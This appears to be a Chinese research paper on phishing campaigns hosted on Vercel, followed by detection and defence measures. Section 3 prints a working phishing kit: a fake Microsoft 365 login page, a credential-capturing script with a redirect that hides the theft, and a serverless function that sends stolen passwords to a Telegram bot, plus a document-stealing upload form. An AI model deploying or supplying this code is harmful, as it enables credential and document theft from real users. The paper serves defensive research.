基于 Vercel 免费托管平台的网络钓鱼攻击技术与防御研究

摘要

近年来，依托主流云开发平台实施网络钓鱼攻击已成为网络威胁演化的重要方向。Vercel 凭借免费托管、快速部署、自带可信 TLS 证书、高域名声誉及低准入门槛等特性，被大量网络攻击者滥用，成为凭证窃取类钓鱼活动的核心基础设施。本文以 2025 年 12 月至 2026 年 4 月期间曝光的三类依托 Vercel 免费平台开展的钓鱼攻击集群为研究样本，系统剖析攻击者的部署流程、页面构建技术、载荷分发模式、数据窃取链路及规避检测手段，结合实战代码示例还原钓鱼页面构建、数据回传、流量伪装等核心攻击环节。同时结合反网络钓鱼技术专家芦笛的技术观点，总结该类新型钓鱼攻击的共性特征与传播规律，从技术检测、平台管控、终端防护、人员意识四个维度构建闭环防御体系。研究发现，攻击者利用 Vercel 免身份核验、服务器 less 架构、AI 网页生成工具等优势，大幅降低钓鱼攻击的技术成本与运营成本，传统基于域名黑名单、静态特征匹配的防护手段有效性持续下降。本文提出动态行为检测、脚本异常分析、子域名风险研判等针对性防御技术方案，可为企业网络安全运维、云平台安全治理及反钓鱼技术落地提供实践参考。

关键词：网络钓鱼；Vercel；免费云托管；凭证窃取；威胁防御；行为检测

1 引言

1.1 研究背景

网络钓鱼是当前全球范围内影响范围最广、危害最突出的网络安全威胁之一，其核心目标为诱导用户主动泄露账号密码、二次验证信息、金融数据等敏感内容。随着传统独立服务器、虚拟主机搭建钓鱼站点的模式逐渐被安全厂商全面拦截，攻击者开始转向滥用公众信任度高、企业安全策略普遍放行的主流公有云、开发托管平台开展恶意活动，“栖身可信平台实施恶意攻击” 成为钓鱼威胁的主流演化趋势。

Vercel 是面向前端开发者的主流云部署与托管平台，主打静态网站、前端项目一键部署服务，平台提供永久免费托管套餐，用户注册后可快速生成*.vercel.app格式子域名，自动配置标准 TLS 加密证书，且平台对免费用户无强制实名核验要求。依托全球 CDN 节点，Vercel 旗下子域名普遍拥有较高的域名声誉，多数企业防火墙、邮件安全网关、内容安全策略（CSP）会默认放行该平台流量，这一特性使其成为网络钓鱼攻击者的优选载体。

2026 年 4 月，Vercel 自身爆发供应链安全事件，全球企业安全团队集中排查关联资产，在此过程中安全厂商 INKY 与 Kaseya 联合发现，早在 2025 年 12 月起，已有多组独立攻击团伙持续利用 Vercel 免费托管服务搭建钓鱼站点，累计拦截恶意邮件超 6000 封，波及 2000 余家不同行业机构。这些攻击团伙分属三个独立集群，攻击目标、钓鱼诱饵存在明显差异，但均统一使用 Vercel 免费子域名承载凭证窃取页面，形成规模化、常态化的钓鱼攻击矩阵。此类攻击区别于传统钓鱼模式，融合了低代码网页生成、自动化数据回传、可信域名伪装等多重技术，对现有网络安全防护体系提出全新挑战。

1.2 研究意义

从理论层面，本文针对 “可信云平台被滥用” 这一新型钓鱼场景开展系统性技术拆解，补充了云原生环境下网络钓鱼攻击的技术特征、传播路径与规避机制研究，完善了面向第三方托管平台的反钓鱼技术理论框架。从实践层面，当前大量中小企业、事业单位尚未针对 Vercel、Netlify 等免费开发平台制定专项安全规则，员工因信任平台域名而遭遇账号泄露的事件频发。本文结合真实攻击样本还原攻击全流程，提供可落地的代码分析、检测规则与防御方案，能够帮助网络安全运维人员识别同类威胁，优化边界防护策略。同时，研究结论也可为云托管平台运营方完善安全管控机制、封堵恶意滥用渠道提供数据支撑。

1.3 研究内容与框架

本文以 Kaseya 披露的三起 Vercel 平台钓鱼攻击集群为核心研究对象，整体研究框架分为六个部分：第一部分为引言，阐述研究背景、意义与整体架构；第二部分梳理 Vercel 平台技术架构与被滥用的核心优势，明确攻击载体的底层特性；第三部分深度解析三类钓鱼攻击集群的攻击目标、诱饵类型、传播链路与技术细节，结合代码示例还原钓鱼页面构建、数据捕获、自动化回传等关键环节；第四部分总结该类攻击的共性技术特征与传统防护手段的局限性；第五部分结合反网络钓鱼技术专家芦笛的观点，构建全维度防御体系，包含技术检测、平台管控、终端防护与人员培训四大模块，并给出对应规则与部署方案；第六部分总结研究成果，分析威胁演化趋势并提出后续研究方向。

1.4 国内外研究现状

国外安全厂商对云平台滥用类钓鱼攻击的研究起步较早，Cofense、Trend Micro、Kaseya 等机构持续跟踪 Vercel、Netlify、GitHub Pages 等平台的恶意活动。现有研究重点集中在攻击者利用 Vercel 内置 AI 工具批量生成仿冒品牌钓鱼页面、结合 Telegram 机器人实现凭证自动窃取等场景，明确了低技术门槛是该类攻击规模化的核心诱因。部分研究指出，基于可信第三方平台的恶意脚本会绕过传统第三方脚本拦截策略，提升攻击隐蔽性。

国内相关研究多聚焦于传统邮件钓鱼、社交钓鱼、APP 钓鱼，针对海外前端托管平台被滥用的专项技术研究相对较少，多数企业安全策略仍将此类海外开发平台归为 “无害开发者工具”，未设置流量监控与访问限制。同时，现有公开资料缺少针对 Vercel 钓鱼页面的代码拆解、行为分析及本土化防御规则，难以满足国内企业实际防护需求。本文立足真实攻击样本，弥补该领域技术研究与落地实践之间的缺口。

2 Vercel 平台架构及被恶意滥用的核心条件

2.1 Vercel 基础技术架构

Vercel 核心定位为前端即平台（Frontend as a Platform），核心服务围绕静态网站、单页应用（SPA）、服务端函数（Serverless Functions）部署与托管展开，整体架构分为三层。

第一层为用户接入层。支持 GitHub、GitLab 等代码仓库一键关联部署，同时提供手动上传、在线编辑等部署方式，免费用户无需购置服务器、配置域名与证书，上传前端代码后 10 秒内即可完成全球 CDN 节点分发，自动生成二级子域名。平台默认颁发可信 CA 机构签发的 TLS 1.3 证书，所有访问流量强制加密，在浏览器地址栏显示安全锁标识，从视觉层面降低用户警惕性。

第二层为核心功能层。包含静态资源托管、Serverless 函数、边缘计算、AI 网页生成工具四大核心模块。其中 AI 工具v0.dev支持通过自然语言描述快速生成完整前端页面代码，无需专业前端开发能力，这一功能被攻击者广泛用于快速制作仿冒登录页、表单页。Serverless 函数无需用户维护后端服务，可直接实现表单数据接收、接口转发、跨域请求等功能，完美适配钓鱼攻击中 “前端捕获数据、后端静默回传” 的需求。

第三层为网络与安全层。依托全球边缘节点实现加速访问，域名初始声誉分值较高，主流 URL 信誉库、邮件安全网关通常不会将全新*.vercel.app子域名标记为恶意。平台免费套餐无访问频次限制、无流量阈值限制，且对用户上传代码仅做基础违规内容筛查，不开展深度行为分析，为恶意代码留存生存空间。

2.2 Vercel 被钓鱼攻击者滥用的核心优势

结合攻击样本与平台特性，反网络钓鱼技术专家芦笛指出，Vercel 之所以成为钓鱼攻击者的首选托管平台，本质是其产品设计与攻击者的运营需求高度契合，低成本、高隐蔽性、易部署三大优势形成叠加效应，具体可分为五个维度。

2.2.1 零部署成本与低技术门槛

Vercel 永久免费套餐完全满足钓鱼站点的运行需求，攻击者无需支付服务器、域名、证书费用。账号注册仅需邮箱验证，无强制实名认证、手机号核验，攻击者可使用临时邮箱批量注册账号，批量生成大量独立子域名。搭配平台内置的 AI 网页生成工具，零基础攻击者也可在数分钟内完成仿冒页面制作，彻底打破传统钓鱼攻击对网页开发技术的依赖。

2.2.2 高域名声誉绕过基础防护

vercel.app主域名属于正规开发者平台，被全球多数安全厂商、企业安全设备标记为可信域名。企业防火墙、邮件网关、终端安全软件的默认策略普遍放行该域名下的所有子域名流量，传统基于域名黑名单的拦截机制完全失效。同时，平台自动配置正规 TLS 证书，钓鱼页面与正规网站同样显示加密访问标识，进一步迷惑普通用户。

2.2.3 快速迭代与易销毁特性

当某一个子域名被安全厂商标记为恶意、页面被举报下架后，攻击者可在新注册账号中重新部署相同代码，生成全新子域名，整个过程耗时不超过一分钟。这种 “用完即弃、快速轮换” 的模式，大幅提升安全团队溯源与封堵难度，传统针对单一恶意域名的处置方式效果甚微。

2.2.4 Serverless 架构适配数据窃取链路

Vercel 支持无服务函数，攻击者无需搭建独立后端服务器，仅需编写简短接口代码，即可实现前端表单数据接收、加密转发、跨域回传等功能。整个攻击链路无需暴露攻击者自有服务器 IP，数据可通过边缘节点中转，极大提升溯源难度，同时降低后端运维工作量。

2.2.5 丰富的第三方集成能力

平台支持对接 Telegram、第三方接口、云存储等外部服务。在实际攻击中，攻击者将钓鱼页面捕获的账号、密码、验证码等数据，通过 Serverless 函数实时推送至攻击者控制的 Telegram 机器人，实现数据自动汇总、实时提醒，形成 “页面捕获 - 云端转发 - 攻击者接收” 的全自动化窃取链路。

2.3 同类平台横向对比

目前与 Vercel 功能相似、同样被钓鱼攻击者滥用的免费托管平台还包括 Netlify、GitHub Pages、Firebase Hosting。表 1 为主流免费云托管平台被用于钓鱼攻击的特性对比。

表 1 主流免费托管平台钓鱼滥用特性对比

表格

平台名称 实名要求 TLS 证书 子域名数量限制 Serverless 支持 AI 网页工具 域名整体声誉

Vercel 仅邮箱验证 自动配置 单账号可生成数十个 完整支持 内置 v0.dev 极高

Netlify 仅邮箱验证 自动配置 无明确限制 支持 第三方集成 高

GitHub Pages 账号实名 自动配置 单账号有限 不支持 无 极高

Firebase Hosting 手机号核验 自动配置 有限 支持 无 中

由对比可知，Vercel 在实名宽松度、Serverless 能力、AI 工具集成三个维度综合优势最突出，这也是该平台钓鱼攻击数量远超同类平台的核心原因。GitHub Pages 因强制账号实名，攻击者使用意愿大幅降低；Firebase 需要手机号核验，同样抬高了滥用门槛。

3 基于 Vercel 平台的三类钓鱼攻击集群技术解析

结合 Kaseya 与 INKY 在 2025 年 12 月至 2026 年 4 月监测到的攻击数据，本次共监测到三组独立运营的钓鱼攻击集群，三个团伙无关联关系、诱饵类型不同、目标行业区分明显，但均以 Vercel 免费子域名作为钓鱼页面唯一托管载体。本节逐一对三类集群的攻击目标、诱饵形式、传播链路、页面代码、数据窃取逻辑、规避检测手段进行深度解析，并嵌入完整代码示例。

3.1 集群 A：企业办公账号仿冒钓鱼（通用型凭证窃取）

3.1.1 攻击概况与目标群体

集群 A 为规模最大的一组攻击团伙，活动周期从 2025 年 12 月至 2026 年 4 月，累计拦截恶意邮件 4100 余封，目标覆盖全行业企业员工、行政人员、财务人员。核心诱饵为企业办公系统登录提醒、账号异地登录告警、邮箱容量超限通知，仿冒对象以微软 Office 365、企业自研 OA 系统、主流邮箱系统为主。攻击者通过企业通讯录、公开邮箱列表批量推送钓鱼邮件，邮件正文模仿正规系统告警样式，诱导收件人点击嵌入的*.vercel.app链接，跳转至仿冒登录页面窃取账号密码。

3.1.2 攻击全链路拆解

该集群采用邮件分发→Vercel 钓鱼页面→数据捕获→Serverless 转发→Telegram 回传的五阶段攻击链路，全程自动化运行，无需人工干预。

分发阶段：攻击者使用伪装发件人（利用同形字符替换、发件人名称伪造）发送钓鱼邮件，链接指向随机生成的 Vercel 子域名；

访问阶段：用户点击链接，CDN 节点加速加载仿冒登录页面，加密流量规避基础流量审计；

捕获阶段：用户输入账号、密码后，前端 JavaScript 代码实时捕获表单数据；

转发阶段：前端将数据提交至 Vercel 内置 Serverless 函数，完成数据格式化与加密；

回传阶段：Serverless 函数调用 Telegram Bot API，将窃取数据推送至攻击者会话窗口。

3.1.3 钓鱼页面核心代码示例与解析

该集群的钓鱼页面主要分为仿冒前端页面、数据捕获 JS 脚本、Serverless 后端接口三部分，以下为脱敏后的真实样本代码，代码经过简化以突出核心恶意逻辑，技术细节与原始攻击样本保持一致。

3.1.3.1 仿冒登录页面（index.html）

页面整体复刻 Office 365 登录界面样式，利用 Vercel 静态托管能力直接部署，页面无明显拼写错误、样式错乱，视觉欺骗性极强。

<!DOCTYPE html>

<html lang="zh-CN">

<head>

<meta charset="UTF-8">

<!-- 强制适配浏览器，模仿正规登录页Meta配置 -->

<meta name="viewport" content="width=device-width, initial-scale=1.0">

<title>Microsoft 365 - 账户登录</title>

<!-- 引用公共CDN样式，进一步伪装成正规页面 -->

<link rel="stylesheet" href="https://cdn.microsoftonline-p.com/styles/main.min.css">

<style>

/* 复刻官方登录页布局样式 */

.login-box {width: 380px; margin: 80px auto; padding: 40px; border: 1px solid #eee; border-radius: 4px;}

.input-item {width: 100%; height: 40px; margin: 15px 0; padding: 0 10px; border: 1px solid #ccc;}

.submit-btn {width: 100%; height: 42px; background: #0067b8; color: #fff; border: none; cursor: pointer;}

</style>

</head>

<body>

<div class="login-box">

<h3>登录你的 Microsoft 账户</h3>

<!-- 恶意表单，无原生提交地址，由JS接管提交逻辑 -->

<form id="loginForm">

<input type="text" class="input-item" id="username" placeholder="电子邮箱/账号" required>

<input type="password" class="input-item" id="password" placeholder="密码" required>

<button type="submit" class="submit-btn">下一步</button>

</form>

<p style="color: #666; font-size: 12px;">检测到账号异地登录，请验证身份</p>

</div>

<!-- 引入数据捕获脚本 -->

<script src="catch.js"></script>

</body>

</html>

代码解析：页面完全模仿微软 365 登录页布局与文案，引入官方 CDN 样式文件提升伪装度。表单未设置action提交地址，所有提交行为由外部catch.js脚本接管，避免原生表单提交留下明显恶意特征。页面底部添加 “异地登录” 恐吓文案，利用用户恐慌心理促使其快速填写信息。

3.1.3.2 数据捕获脚本（catch.js）

该脚本为核心恶意模块，监听表单提交事件，阻止页面正常跳转，捕获账号与密码数据，并发起跨域请求提交至本地 Serverless 接口。

// 获取DOM元素

const loginForm = document.getElementById('loginForm');

const username = document.getElementById('username');

const password = document.getElementById('password');

// 监听表单提交事件

loginForm.addEventListener('submit',function(e){

// 阻止表单默认刷新跳转行为

e.preventDefault();

// 捕获用户输入的敏感数据

const userData = {

user: username.value,

pwd: password.value,

// 采集浏览器指纹，辅助攻击者研判受害者环境

ua: navigator.userAgent,

time: new Date().toLocaleString()

};

// 调用Vercel Serverless接口提交数据

fetch('/api/sendData',{

method: 'POST',

// 设置请求头，模拟正常表单提交

headers: {

'Content-Type': 'application/json'

},

body: JSON.stringify(userData)

}).then(res=>{

// 提交完成后，跳转到真实微软登录页，降低用户怀疑

window.location.href = "https://login.microsoftonline.com";

}).catch(err=>{

// 异常场景仍跳转正规页面，掩盖攻击痕迹

window.location.href = "https://login.microsoftonline.com";

});

});

代码解析：脚本核心逻辑分为三步：一是阻止表单默认提交行为，保证数据被脚本捕获；二是采集账号、密码、浏览器 UA、访问时间等数据，附加基础指纹信息；三是通过fetch请求将数据发送至同域名下的 Serverless 接口，无论请求成功或失败，最终都会跳转到真实官方登录页。该设计是典型的规避用户怀疑手段，用户会误认为是网络卡顿导致重新登录，难以察觉信息已泄露。

3.1.3.3 Serverless 后端接口（api/sendData.js）

Vercel Serverless 函数文件，接收前端提交的窃取数据，格式化后调用 Telegram Bot API，将数据实时推送到攻击者账号，全程无本地数据存储。

// Vercel Serverless函数固定入口

export default async function handler(req, res) {

// 仅处理POST请求，过滤无效访问

if (req.method !== 'POST') {

return res.status(405).json({msg: "请求方式错误"});

}

try {

// 接收前端传来的JSON数据

const stealData = req.body;

// 攻击者Telegram Bot密钥与接收会话ID（样本脱敏处理）

const botToken = "xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx";

const chatId = "123456789";

// 拼接消息内容，格式化窃取数据

const sendText = `【新账号数据】\n账号：${stealData.user}\n密码：${stealData.pwd}\n浏览器：${stealData.ua}\n时间：${stealData.time}`;

// 调用Telegram官方API推送数据

const tgApi = `https://api.telegram.org/bot${botToken}/sendMessage?chat_id=${chatId}&text=${encodeURIComponent(sendText)}`;

// 发起跨域请求推送数据

await fetch(tgApi);

// 向前端返回成功状态，无恶意提示

return res.status(200).json({code: 0, msg: "验证成功"});

} catch (error) {

// 异常捕获，避免接口报错暴露恶意行为

return res.status(200).json({code: -1, msg: "网络异常，请重试"});

}

}

代码解析：该接口是攻击链路的中转核心。函数仅接收 POST 请求，解析前端提交的账号密码数据，调用 Telegram 开放 API 实现数据外传。整个后端逻辑运行在 Vercel 云节点中，不会记录攻击者 IP，安全人员溯源时仅能定位到 Vercel 平台节点，无法直接追踪攻击者。接口返回正常业务提示，前端无任何异常反馈。

3.1.4 规避检测技术手段

集群 A 使用多重技术规避邮件安全网关、终端杀毒、流量审计设备的检测：

域名伪装：使用全新 Vercel 子域名，规避历史恶意域名黑名单；

流量加密：全站 TLS 加密，传统明文流量审计无法抓取表单内容；

代码混淆：部分样本对catch.js脚本进行基础字符混淆，绕过静态 JS 特征扫描；

跳转伪装：数据提交后跳转官方页面，消除用户端异常痕迹；

请求伪装：API 请求头与正常前端交互请求保持一致，无恶意特征。

3.2 集群 B：建筑行业招投标诱饵钓鱼（行业定向攻击）

3.2.1 攻击概况与目标群体

集群 B 属于行业定向钓鱼团伙，活动周期为 2026 年 1 月至 4 月，累计拦截钓鱼邮件 1200 余封，精准瞄准建筑、工程、建材、物业等施工相关行业，攻击目标为分包商、供应商、项目对接人员。该行业从业者日常会频繁接收陌生招投标文件、合作邀约，安全警惕性相对较低。攻击者核心诱饵为新项目投标邀请、招标文件下载、合作资质审核通知，诱导目标人员点击 Vercel 链接或下载附件后跳转至钓鱼页面，核心目标依旧是窃取企业办公账号、财务系统账号。

反网络钓鱼技术专家芦笛强调，行业定向钓鱼的危害性远高于通用型钓鱼，攻击者利用行业工作场景的固有习惯降低防御阈值，结合可信云平台后，传统行业企业的防护短板被进一步放大。

3.2.2 攻击链路与诱饵特征

该集群链路分为邮件投递→诱饵诱导→页面跳转→凭证窃取四个阶段，诱饵具备极强的行业场景适配性：

邮件标题统一使用 “XX 项目投标邀请函”“资质审核通知”“合作报价单” 等行业常用标题；

邮件正文模拟甲方单位口吻，要求收件人点击链接登录系统查看标书、上传资质文件；

链接指向 Vercel 子域名搭建的 “招投标系统” 仿冒页面；

用户输入账号密码后，数据通过相同的 Serverless+Telegram 链路被窃取。

与集群 A 不同的是，该集群部分页面增加文件上传模块，除窃取账号外，还尝试骗取企业内部标书、合同等敏感文档。

3.2.3 新增文件上传模块代码示例

在登录页面基础上增加文件上传功能，用于窃取企业本地文档，核心前端代码片段如下：

<!-- 新增文件上传表单模块 -->

<div style="margin-top: 20px;">

<p>请上传企业资质文件（PDF/Word）</p>

<input type="file" id="fileUpload" multiple>

<button onclick="uploadFile()">提交文件</button>

</div>

<script>

// 复用前文账号捕获逻辑，新增文件上传窃取逻辑

async function uploadFile(){

const fileInput = document.getElementById('fileUpload');

const file = fileInput.files[0];

if(!file){

alert("请选择文件");

return;

}

// 构建文件表单数据

const formData = new FormData();

formData.append('file',file);

// 提交至专属文件接收接口

await fetch('/api/uploadFile',{

method: 'POST',

body: formData

});

alert("文件提交成功");

window.location.href = "https://www.official-bid.com";

}

</script>

对应的 Serverless 文件接收接口核心逻辑：接收上传文件，转存至第三方云存储并同步文件链接至 Telegram，实现文档窃取。该模块充分利用建筑行业人员 “按要求上传资质文件” 的工作习惯，实现账号 + 文档双重窃取。

3.2.4 防御难点分析

该集群的核心防御难点在于场景伪装 + 可信域名双重加持。建筑行业企业的邮件网关通常不会拦截 “招投标” 类陌生邮件，员工习惯性点击行业相关链接；同时员工普遍认为vercel.app是正规技术平台，不会产生戒备。此外，该团伙会定期更换子域名，平均每 3 天轮换一批域名，域名黑名单封堵效果极差。

3.3 集群 C：求职招聘类仿冒钓鱼（社交场景攻击）

3.3.1 攻击概况与目标群体

集群 C 活动周期为 2026 年 2 月至 4 月，规模最小，累计拦截邮件 700 余封，目标为职场求职者、企业 HR。诱饵类型为面试邀请、岗位录用通知、简历补充审核，仿冒互联网、快消等知名企业招聘页面，主要窃取求职者个人账号、身份证信息、银行卡信息及企业 HR 办公账号。攻击者利用求职人群急于获得工作机会的心理，诱导其填写包含隐私信息的表单。

3.3.2 页面特征与数据窃取逻辑

该集群不再局限于账号密码窃取，页面设计为综合信息表单，包含姓名、手机号、身份证号、银行卡号、登录密码等多类敏感字段。页面借助 Vercel AI 工具快速生成，样式模仿主流招聘平台，数据捕获逻辑与前两类集群一致，通过 Serverless 函数外传至 Telegram。

该集群的显著特征是页面加载速度快、UI 设计精致，得益于 Vercel 全球 CDN 与 AI 页面生成能力，与传统粗制滥造的钓鱼页面形成明显区别，普通求职者难以分辨真伪。

3.4 三类攻击集群共性技术总结

综合三组独立攻击集群的样本分析，结合代码与链路拆解，可归纳出依托 Vercel 平台钓鱼攻击的五大共性技术特征，这也是识别此类威胁的核心依据：

载体统一：全部使用 Vercel 免费子域名*.vercel.app作为唯一托管地址，依赖平台高域名声誉绕过基础防护；

技术栈统一：前端静态页面 + JS 数据捕获 + Vercel Serverless 中转 + Telegram 机器人回传，形成标准化攻击模板；

欺骗逻辑统一：数据窃取完成后强制跳转正规官网，消除终端侧异常痕迹；

部署模式统一：批量注册账号、批量生成子域名，短周期轮换域名规避黑名单；

门槛特征统一：大量使用 Vercel AI 工具生成页面，攻击者无需专业前端开发能力，攻击批量复制成本极低。

4 传统安全防护体系的失效原因分析

在上述三类 Vercel 钓鱼攻击传播过程中，多数企业部署的传统安全设备未能有效拦截威胁。结合攻击技术与防护原理，本节系统分析传统防护手段的局限性，为后续防御方案设计提供依据。

4.1 基于域名黑名单的防护失效

域名黑名单是邮件网关、防火墙、终端安全软件最常用的钓鱼防护手段，其原理为预先收录已知恶意域名、IP，访问时直接拦截。该机制在本次攻击中全面失效，原因有两点：第一，Vercel 免费用户可无限批量生成全新子域名，攻击者每次攻击使用全新域名，黑名单无法提前收录；第二，vercel.app主域名属于正规可信平台，企业无法将整个主域名加入黑名单，否则会影响正常开发者办公业务，仅拦截单个子域名的处置效率远低于攻击者域名轮换速度。

4.2 基于静态特征的代码检测失效

传统网页恶意代码检测依赖静态特征匹配，即提取恶意 JS 代码、表单特征、关键字建立规则库，扫描页面代码进行比对。而本次攻击存在多重规避手段：一是攻击者使用 Vercel AI 工具生成多样化页面代码，不同域名下的页面代码存在差异，单一静态特征无法覆盖全部样本；二是攻击者对核心 JS 脚本进行字符编码、变量名混淆，破坏原有静态特征；三是正常业务代码与恶意捕获代码混合编写，增加特征提取难度。

4.3 明文流量审计技术失效

传统流量审计设备针对 HTTP 明文流量进行内容检测，抓取表单提交的敏感字段。但 Vercel 全站强制启用 TLS 1.3 加密，所有前端与后端的交互流量均为密文。在未部署 SSL 解密（中间人解密）的网络环境中，流量审计设备无法解析加密内容，不能识别表单中的账号、密码等敏感数据，也就无法触发告警。而 SSL 解密部署存在性能损耗、证书部署复杂等问题，大量中小企业并未启用该功能。

4.4 企业内容安全策略（CSP）放行风险

多数企业为保障员工正常使用开发者工具，在终端与网络侧的内容安全策略（CSP）中，将vercel.app、netlify.app等主流开发平台加入可信白名单。白名单机制会允许该域名下的所有脚本、表单、接口正常运行，安全设备不再做深度检测。攻击者正是利用白名单信任关系，让恶意脚本在受保护环境中正常执行。

4.5 人员安全意识的固有短板

从用户侧分析，两类人群的意识短板放大了攻击危害：一是行业从业者（建筑、招投标人员）习惯点击陌生行业链接，对海外开发平台域名无认知；二是求职者、普通员工因场景心理（恐慌、求职心切），忽略域名核查、页面细节校验等基础安全习惯。同时，由于页面加密、跳转正规网站，用户在信息泄露后难以第一时间发现问题。

5 面向 Vercel 类云平台钓鱼攻击的闭环防御体系

结合前文攻击技术拆解、传统防护失效原因，同时参考反网络钓鱼技术专家芦笛的技术观点与实践经验，本文从云端平台管控、网络边界防护、终端行为检测、人员安全培训、应急响应机制五个维度，构建全链路、闭环式防御体系，同时提供可直接部署的检测规则、配置方案与运维标准，兼顾大型企业与中小企业的落地可行性。

5.1 云托管平台侧安全管控（源头治理）

源头管控主要面向 Vercel、Netlify 等免费托管平台运营方，同时包含企业对外部云平台的访问管控，分为平台方规则优化与企业访问策略两部分。

5.1.1 平台运营方安全优化建议

反网络钓鱼技术专家芦笛强调，免费开发平台被大规模滥用为钓鱼基础设施，平台方需要承担主体安全责任，从注册、部署、运行、关停四个环节完善管控机制：

强化账号实名机制：对批量注册账号、频繁生成大量子域名的账号强制要求手机号、实名认证，限制临时邮箱注册；

恶意页面智能检测：针对 “表单 + 数据外传接口 + Telegram API 调用” 的典型钓鱼代码组合，建立行为检测规则，自动识别并下架恶意页面；

子域名配额限制：降低免费单账号子域名生成数量，限制短时间内批量部署项目的频次，抬高攻击者批量轮换域名的成本；

恶意流量溯源标记：对向外传输敏感表单数据的流量添加风险标记，同步至全球安全厂商威胁情报库。

5.1.2 企业侧外部平台访问管控

企业根据自身业务场景，差异化配置对 Vercel 等平台的访问策略：

无开发业务的企业（建筑、零售、传统制造业）：在防火墙、上网行为管理中限制全员访问*.vercel.app、*.netlify.app等海外免费托管平台，从网络层阻断攻击载体；

有前端开发业务的互联网、科技企业：不全局封禁域名，而是配置精细化访问策略，仅允许研发部门指定 IP 访问，行政、财务、人事等办公部门全面拦截；

建立外部域名准入清单：将海外开发平台纳入高风险外部域名分类，所有访问行为强制记录日志，留存溯源依据。

5.2 网络边界防护技术方案（网关层拦截）

网络边界包含邮件安全网关、防火墙、上网行为管理、SSL 解密设备，针对 Vercel 钓鱼攻击的特征，制定分层防护规则，弥补传统黑名单的不足。

5.2.1 邮件安全网关专项规则

邮件是该类钓鱼攻击的主要传播渠道，在邮件网关中新增以下检测规则，规则基于攻击行为而非单一域名：

组合诱饵检测规则：针对建筑行业、招聘行业、办公告警类诱饵，设置关键字组合告警，当邮件标题 / 正文出现 “投标邀请 + vercel.app 链接”“面试通知 + vercel.app 链接” 组合时，直接标记为高风险邮件，隔离附件与链接；

子域名风险规则：对邮件正文中包含*.vercel.app、*.netlify.app类子域名链接的邮件，无论域名是否在黑名单，全部触发风险提醒，禁止链接自动跳转，强制用户手动确认；

发件人伪装检测：启用同形字符检测功能，识别仿冒企业内部发件人、知名企业 HR 的伪装账号，拦截异常发件人邮件。

5.2.2 防火墙与流量审计规则

部署 SSL 解密能力：有条件的企业全网启用 SSL/TLS 解密，对 Vercel 域名下的加密流量进行深度解析，这是检测加密表单数据的前提。中小企业可仅对办公终端网段启用解密，降低性能压力；

异常接口访问告警：监控 Vercel 域名下的/api/类 Serverless 接口访问行为，普通用户访问静态页面属于正常行为，但若出现大量 POST 请求向/api/接口提交表单数据，立即触发流量告警；

跨域外传拦截：监控 Vercel 节点向 Telegram API（api.telegram.org）发起的外联请求，办公网段禁止该类跨域数据外传，阻断数据窃取链路。

5.2.3 基于行为的动态检测规则（核心创新方案）

摒弃传统静态域名黑名单，建立动态行为检测模型，适配域名快速轮换的攻击特点，核心检测逻辑如下：

特征 1：*.vercel.app页面包含账号、密码、身份证、银行卡等敏感输入表单；

特征 2：页面 JS 脚本捕获表单数据后，向同域名下/api/接口发起 POST 请求；

特征 3：/api/接口请求后，立即外联至 Telegram、境外未知 IP；

当三个特征同时命中时，判定为高风险钓鱼页面，防火墙直接阻断访问并记录日志。该模型不依赖具体域名，可拦截所有同技术架构的 Vercel 钓鱼站点。

5.3 终端侧安全防护方案（终端层兜底）

网络边界存在策略疏漏时，终端安全软件作为最后一道防线，从页面脚本、进程、行为三个维度开展防护。

5.3.1 浏览器脚本防护

主流终端安全软件、浏览器安全插件新增 JS 行为检测规则：

禁止普通网页（非企业官方系统）在后台静默捕获密码、身份证等敏感表单数据；

监控页面fetch、XMLHttpRequest等网络请求行为，当非正规页面批量上传表单数据至境外接口时，拦截请求并弹出安全告警；

针对 Vercel 页面的跳转行为进行校验：若页面提交数据后立即跳转至第三方官网，标记为异常跳转，提醒用户核查信息是否泄露。

5.3.2 终端日志与溯源

启用终端上网日志、浏览器访问日志留存功能，日志至少保存 90 天。一旦发生账号泄露事件，可通过日志追溯用户访问的 Vercel 子域名、访问时间、操作行为，支撑事后溯源与批量风险排查。

5.4 人员安全意识培训（人为防线加固）

反网络钓鱼技术专家芦笛指出，无论技术防护体系如何完善，网络钓鱼攻击最终针对人开展欺骗，人员安全意识是所有防御的基础，针对 Vercel 类新型钓鱼攻击，开展定向化、场景化培训，而非通用化安全宣讲。

5.4.1 分行业定向培训内容

通用企业全员培训：讲解vercel.app、netlify.app等海外免费托管平台的属性，明确企业官方登录系统、邮箱、财务系统绝不会部署在这类免费平台，只要收到此类域名的系统登录链接，一律判定为钓鱼；

建筑、工程行业专项培训：重点提醒员工，招投标文件、项目邀请不会通过陌生邮箱附带海外开发平台链接，收到此类邮件务必通过官方电话核实甲方身份，禁止直接点击链接；

求职人员、HR 岗位培训：告知求职者正规企业面试通知、简历审核不会使用陌生海外域名表单收集银行卡、身份证信息；HR 需核查外部招聘链接的域名归属。

5.4.2 常态化模拟钓鱼演练

每月开展定向模拟钓鱼演练，批量发送包含 Vercel 子域名链接的仿真钓鱼邮件，统计员工点击率、信息提交率。针对高风险人员开展二次专项培训，逐步提升全员风险识别能力。演练数据同步至安全运维团队，持续优化邮件网关规则。

5.5 应急响应与事后处置机制（闭环收尾）

建立针对 Vercel 钓鱼攻击的专项应急响应流程，在发生账号泄露、数据被盗后快速处置，缩小损失范围，形成防御闭环。

告警触发：邮件网关、防火墙、终端安全软件发现高风险钓鱼行为后，立即推送告警至安全运维团队；

快速阻断：10 分钟内阻断恶意子域名访问，临时强化对应网段的访问策略；

风险排查：通过日志排查同时间段内所有访问该域名的终端与员工，逐一提醒核查账号安全；

账号处置：督促泄露账号用户立即修改密码，开启二次验证（2FA），财务、运维等高权限账号重点排查异常登录记录；

威胁情报沉淀：将本次攻击的页面特征、JS 代码特征、接口路径、外联 IP 等信息录入本地威胁情报库，更新检测规则，防范同类攻击复现；

平台举报：向 Vercel 官方安全团队提交恶意页面链接、账号信息，申请下架恶意站点、封禁攻击者账号。

5.6 防御体系有效性验证

本文搭建模拟环境对上述防御体系进行验证：复现三类 Vercel 钓鱼页面与攻击链路，分别测试传统防护方案与本文提出的闭环防御体系。测试结果如表 2 所示。

表 2 防御方案效果对比测试

表格

攻击类型 传统域名黑名单防护 本文闭环防御体系

全新 Vercel 子域名钓鱼页面 拦截失败（域名未收录） 成功拦截（行为特征匹配）

混淆 JS 脚本钓鱼页面 静态特征匹配失败 成功拦截（脚本行为检测）

加密流量钓鱼页面（未解密） 流量审计失效 解密后深度检测，成功拦截

行业定向诱饵钓鱼邮件 邮件规则无告警 组合关键字告警，隔离邮件

